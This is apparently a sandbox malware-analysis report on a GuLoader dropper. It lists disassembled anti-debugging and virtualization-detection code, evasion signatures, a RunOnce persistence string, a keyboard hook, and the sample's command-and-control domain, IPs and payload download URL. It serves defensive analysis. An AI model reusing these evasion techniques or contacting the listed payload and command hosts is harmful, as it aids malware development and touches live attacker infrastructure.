Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000000567E2C second address: 0000000000567E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 000000000056177F second address: 0000000000561808 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+0000025Bh], eax 0x00000009 mov eax, dword ptr [ebp+0000025Bh] 0x0000000f je 00007F7648A60C92h 0x00000015 test bl, bl 0x00000017 push 038032CBh 0x0000001c sub dword ptr [esp], 0FF21A02h 0x00000023 xor dword ptr [esp], 10B6888Fh 0x0000002a xor dword ptr [esp], E3389046h 0x00000031 push 2B523B77h 0x00000036 cmp dh, ch 0x00000038 xor dword ptr [esp], 6A5053ABh 0x0000003f add dword ptr [esp], CC3008CFh 0x00000046 xor dword ptr [esp], 0D3271ABh 0x0000004d push dword ptr [ebp+24h] 0x00000050 mov dword ptr [ebp+000001F4h], edx 0x00000056 mov edx, 14EDA824h 0x0000005b add edx, 104167D9h 0x00000061 xor edx, BB5692E1h 0x00000067 test al, dl 0x00000069 xor edx, 9E799D1Ch 0x0000006f push edx 0x00000070 mov edx, dword ptr [ebp+000001F4h] 0x00000076 mov dword ptr [ebp+000001BEh], esi 0x0000007c test cl, dl 0x0000007e mov esi, E709E43Eh 0x00000083 pushad 0x00000084 mov ebx, 000000A7h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000000565E68 second address: 0000000000569606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ecx 0x00000004 mov ecx, dword ptr [ebp+000001D9h] 0x0000000a mov dword ptr [ebp+00000212h], ecx 0x00000010 mov ecx, eax 0x00000012 push ecx 0x00000013 mov ecx, dword ptr [ebp+00000212h] 0x00000019 push dword ptr [ebp+000000D0h] 0x0000001f call 00007F7648790371h 0x00000024 call 00007F764878CCF5h 0x00000029 pop ebx 0x0000002a sub ebx, 05h 0x0000002d mov dword ptr [ebp+0000014Ch], edi 0x00000033 jmp 00007F764878CDD9h 0x00000038 pushad 0x00000039 mov esi, 00000069h 0x0000003e rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 rdtsc 1_2_02261C35
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Window / User API: foregroundWindowGot 513 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 6084 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 Thread sleep count: 250 > 30 Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 Thread sleep time: -125000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5328 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Last function: Thread delayed
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\ANNONCEKAMPAGNE.exe\ROGUYSoftware\Microsoft\Windows\CurrentVersion\RunOnceOTATE
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\ANNONCEKAMPAGNE.exe\ROGUYSet W = CreateObject("WScript.Shell")
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\JXblq0dqPN.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 rdtsc 1_2_02261C35
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022664DD LdrInitializeThunk, 1_2_022664DD
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022685F4 mov eax, dword ptr fs:[00000030h] 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267874 mov eax, dword ptr fs:[00000030h] 1_2_02267874
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267879 mov eax, dword ptr fs:[00000030h] 1_2_02267879
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022654A8 mov eax, dword ptr fs:[00000030h] 1_2_022654A8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262D2C mov eax, dword ptr fs:[00000030h] 1_2_02262D2C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267377 mov eax, dword ptr fs:[00000030h] 1_2_02267377
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022637C8 mov eax, dword ptr fs:[00000030h] 1_2_022637C8

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' Jump to behavior
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: logs.dat.17.dr Binary or memory string: [ Program Manager ]
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458740 Sample: JXblq0dqPN.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 19 wealthyrem.ddns.net 2->19 21 clientconfig.passport.net 2->21 23 prda.aadg.msidentity.com 2->23 31 Found malware configuration 2->31 33 Multi AV Scanner detection for dropped file 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 7 other signatures 2->37 7 JXblq0dqPN.exe 1 2 2->7         started        signatures3 process4 signatures5 39 Creates autostart registry keys with suspicious values (likely registry only malware) 7->39 41 Contains functionality to detect hardware virtualization (CPUID execution measurement) 7->41 43 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 7->43 45 3 other signatures 7->45 10 JXblq0dqPN.exe 2 11 7->10         started        process6 dnsIp7 25 101.99.94.119, 49745, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 10->25 27 wealthyrem.ddns.net 194.5.97.128, 39200, 49746, 49747 DANILENKODE Netherlands 10->27 29 192.168.2.1 unknown unknown 10->29 15 C:\Users\user\AppData\...\ANNONCEKAMPAGNE.exe, PE32 10->15 dropped 17 C:\Users\user\AppData\...\ANNONCEKAMPAGNE.vbs, ASCII 10->17 dropped 47 Tries to detect Any.run 10->47 49 Hides threads from debuggers 10->49 51 Installs a global keyboard hook 10->51 file8 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.5.97.128
 wealthyrem.ddns.net Netherlands
208476 DANILENKODE true
101.99.94.119
 unknown Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
wealthyrem.ddns.net 194.5.97.128 true
clientconfig.passport.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown